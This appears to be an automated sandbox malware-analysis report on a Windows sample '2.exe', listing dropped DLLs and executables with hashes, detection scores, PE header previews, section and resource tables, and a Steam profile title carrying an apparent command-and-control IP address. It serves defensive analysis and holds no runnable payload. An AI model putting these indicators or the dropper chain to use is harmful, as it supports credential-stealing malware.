                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):2459136
                                                                      Entropy (8bit):6.052474106868353
                                                                      Encrypted:false
                                                                      SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                      MD5:90E744829865D57082A7F452EDC90DE5
                                                                      SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                      SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                      SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):685392
                                                                      Entropy (8bit):6.872871740790978
                                                                      Encrypted:false
                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):608080
                                                                      Entropy (8bit):6.833616094889818
                                                                      Encrypted:false
                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):450024
                                                                      Entropy (8bit):6.673992339875127
                                                                      Encrypted:false
                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):2046288
                                                                      Entropy (8bit):6.787733948558952
                                                                      Encrypted:false
                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):257872
                                                                      Entropy (8bit):6.727482641240852
                                                                      Encrypted:false
                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):80880
                                                                      Entropy (8bit):6.920480786566406
                                                                      Encrypted:false
                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\38F9.exe

                                                                      Download File
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):325120
                                                                      Entropy (8bit):7.384635086921583
                                                                      Encrypted:false
                                                                      SSDEEP:6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
                                                                      MD5:EA9DD1EAE2E521666D3F06382104EC10
                                                                      SHA1:46E89AFEB61C1D0852412480EE202D48C7D5ACEB
                                                                      SHA-256:472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
                                                                      SHA-512:1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[7..:Y.:Y.:Y.h..:Y.h...:Y.h..:Y.B..:Y.:X..:Y.1...:Y.h..:Y.1...:Y.Rich.:Y.........................PE..L......c.....................t.......=....... ....@.................................p..........................................d...................................H................................x..@............ ..d............................text...3........................... ..`.rdata...l... ...n..................@..@.data....F...........~..............@....rsrc................L..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\D818.exe

                                                                      Download File
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):2121216
                                                                      Entropy (8bit):6.847336919769676
                                                                      Encrypted:false
                                                                      SSDEEP:49152:s4K3x1vUOJtTF+TxMoxc1TU+j+dAzGwlrh:s4Ex18OtIuoITsdZ
                                                                      MD5:AC1CC39DC3DF2AB7197EC22259A09E17
                                                                      SHA1:6716724FAD0181E499477B7EF431EDE9223FDC89
                                                                      SHA-256:EA815BF1C58680496FC79B83266136DB2F37DD1FFC024E591BC7750E08DBEC08
                                                                      SHA-512:AB0AF5CB8F712DB3B7D5A281A05B60EE952F2572261B0AD74E659FE09CEC480430ECE369D7E3970C864DB91728BC760F9F4F2AF220BC6009FB87ED801AC9A771
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................P............... ....@........................... ..................@...........................`..J"...p...D......................<...................................................................................CODE................................ ..`DATA.....&... ...(..................@...BSS.....-....P.......6...................idata..J"...`...$...6..............@....tls.................Z...................rdata...............Z..............@..P.reloc..<............\..............@..P.rsrc....D...p...D..................@..P.............. ......^ .............@..P........................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\katB4C0.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\D818.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):881664
                                                                      Entropy (8bit):6.555251818096116
                                                                      Encrypted:false
                                                                      SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                                      MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                                      SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                                      SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                                      SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\jssrvvh

                                                                      Download File
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):240128
                                                                      Entropy (8bit):6.781133294973138
                                                                      Encrypted:false
                                                                      SSDEEP:3072:25BjyAijBcIXby+Gl7BVqlrovGJnVAS+CamnIys7TEkA8C7uT8:EajBxm74OGeCao2rA8CKT
                                                                      MD5:4D956BA3709B6BE0CC4910690EF93F0B
                                                                      SHA1:699A84B4E11844653E1D0CF90D9EFDA870D737FD
                                                                      SHA-256:91713A00DD18D04D68A6B34AC3C20206F1BD38CFB72506EF32BAADD380C3F993
                                                                      SHA-512:21AAC4778A9DAA054F1B2FDE63854D93CFF419F62CCF1EB77A584C8560BBDFAC39F07B7DF70399BE1250EC2DC856C053901206EDFACDBA706BB844CEC6DDDF7F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*..Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5...Ko......Ko.5...Ko.Rich.Ko.........................PE..L....dee.............................C............@.................................~........................................i..P...................................Dj..............................P_..@...............l............................text...1........................... ..`.rdata..8r.......t..................@..@.data....6.......|...\..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\jssrvvh:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.781133294973138
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:2.exe
                                                                      File size:240'128 bytes
                                                                      MD5:4d956ba3709b6be0cc4910690ef93f0b
                                                                      SHA1:699a84b4e11844653e1d0cf90d9efda870d737fd
                                                                      SHA256:91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993
                                                                      SHA512:21aac4778a9daa054f1b2fde63854d93cff419f62ccf1eb77a584c8560bbdfac39f07b7df70399be1250ec2dc856c053901206edfacdba706bb844cec6dddf7f
                                                                      SSDEEP:3072:25BjyAijBcIXby+Gl7BVqlrovGJnVAS+CamnIys7TEkA8C7uT8:EajBxm74OGeCao2rA8CKT
                                                                      TLSH:1134BE0176D1E4B5E96F06314830C9A91A3EFCA6CD65CA7773583F0F38712906FA276A
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5....Ko......Ko.5....Ko.Rich.Ko.........................PE..L....dee...

                                                                      File Icon

                                                                      Icon Hash:714165295152504b

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4043e7
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x656564C5 [Tue Nov 28 03:55:49 2023 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:8744ff8cb8213e20c3a4b3f29831f2ef

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      call 00007F77311B0AB7h
                                                                      jmp 00007F77311ABEB4h
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      mov eax, dword ptr [ebp+08h]
                                                                      push esi
                                                                      mov esi, ecx
                                                                      and dword ptr [esi+04h], 00000000h
                                                                      mov dword ptr [esi], 00411260h
                                                                      mov byte ptr [esi+08h], 00000000h
                                                                      push dword ptr [eax]
                                                                      call 00007F77311AC0DDh
                                                                      mov eax, esi
                                                                      pop esi
                                                                      pop ebp
                                                                      retn 0004h
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      mov eax, dword ptr [ebp+08h]
                                                                      mov dword ptr [ecx], 00411260h
                                                                      mov eax, dword ptr [eax]
                                                                      mov dword ptr [ecx+04h], eax
                                                                      mov eax, ecx
                                                                      mov byte ptr [ecx+08h], 00000000h
                                                                      pop ebp
                                                                      retn 0008h
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      mov esi, ecx
                                                                      and dword ptr [esi+04h], 00000000h
                                                                      mov dword ptr [esi], 00411260h
                                                                      mov byte ptr [esi+08h], 00000000h
                                                                      call 00007F77311AC047h
                                                                      mov eax, esi
                                                                      pop esi
                                                                      pop ebp
                                                                      retn 0004h
                                                                      mov dword ptr [ecx], 00411260h
                                                                      jmp 00007F77311AC0CBh
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push esi
                                                                      push edi
                                                                      mov edi, dword ptr [ebp+08h]
                                                                      mov esi, ecx
                                                                      cmp esi, edi
                                                                      je 00007F77311AC04Fh
                                                                      call 00007F77311AC0B8h
                                                                      cmp byte ptr [edi+08h], 00000000h
                                                                      je 00007F77311AC03Eh
                                                                      push dword ptr [edi+04h]
                                                                      mov ecx, esi
                                                                      call 00007F77311AC06Ah
                                                                      jmp 00007F77311AC038h
                                                                      mov eax, dword ptr [edi+04h]
                                                                      mov dword ptr [esi+04h], eax
                                                                      pop edi
                                                                      mov eax, esi
                                                                      pop esi
                                                                      pop ebp
                                                                      retn 0004h
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push esi
                                                                      mov esi, ecx
                                                                      mov dword ptr [esi], 00411260h
                                                                      call 00007F77311AC087h
                                                                      test byte ptr [ebp+08h], 00000001h
                                                                      je 00007F77311AC039h
                                                                      push esi
                                                                      call 00007F77311AA2DBh

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ASM] VS2013 build 21005
                                                                      • [ C ] VS2013 build 21005
                                                                      • [C++] VS2013 build 21005
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [C++] VS2013 UPD5 build 40629
                                                                      • [RES] VS2013 build 21005
                                                                      • [LNK] VS2013 UPD5 build 40629

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x169f40x50.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x288c0000xd180.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x16a440x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x15f500x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x100000x16c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000xe3310xe400cc3b17e627fae1387fb8bdcd7e9cab65False0.6025561951754386data6.7344003704078IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x100000x72380x74000cb959f1c73b84a1af2e943c777d4b21False0.38092672413793105data4.835084222498264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x180000x28736e00x17c00554cc61e3d2c68964212d2a96ea99c89unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x288c0000xd1800xd2006592d1255274ef727559b89dba83177bFalse0.3455543154761905data4.557845670729487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      AFX_DIALOG_LAYOUT0x28925a00x2data5.0
                                                                      RT_CURSOR0x28925a80x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                      RT_CURSOR0x28928d80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                      RT_CURSOR0x2892a300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                      RT_CURSOR0x28938d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                      RT_CURSOR0x28941800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                      RT_CURSOR0x28947180x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                      RT_CURSOR0x28948480xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                      RT_CURSOR0x28949200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                      RT_CURSOR0x28957c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                      RT_CURSOR0x28960700x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                      RT_CURSOR0x28966080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                      RT_CURSOR0x28974b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                      RT_CURSOR0x2897d580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                      RT_ICON0x288c7000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0JapaneseJapan0.43576759061833686
                                                                      RT_ICON0x288d5a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0JapaneseJapan0.5473826714801444
                                                                      RT_ICON0x288de500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0JapaneseJapan0.5858294930875576
                                                                      RT_ICON0x288e5180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0JapaneseJapan0.6033236994219653
                                                                      RT_ICON0x288ea800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0JapaneseJapan0.44315352697095434
                                                                      RT_ICON0x28910280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0JapaneseJapan0.4931988742964353
                                                                      RT_ICON0x28920d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0JapaneseJapan0.524822695035461
                                                                      RT_DIALOG0x28985880x5adata0.8666666666666667
                                                                      RT_STRING0x28985e80x42cdataJapaneseJapan0.4597378277153558
                                                                      RT_STRING0x2898a180x58cdataJapaneseJapan0.44577464788732396
                                                                      RT_STRING0x2898fa80x1d2dataJapaneseJapan0.5321888412017167
                                                                      RT_GROUP_CURSOR0x2892a080x22data1.0294117647058822
                                                                      RT_GROUP_CURSOR0x28946e80x30data0.9375
                                                                      RT_GROUP_CURSOR0x28948f80x22data1.0588235294117647
                                                                      RT_GROUP_CURSOR0x28965d80x30data0.9375
                                                                      RT_GROUP_CURSOR0x28982c00x30data0.9375
                                                                      RT_GROUP_ICON0x28925380x68dataJapaneseJapan0.6826923076923077
                                                                      RT_VERSION0x28982f00x294OpenPGP Secret Key0.5045454545454545

                                                                      Imports

                                                                      DLLImport
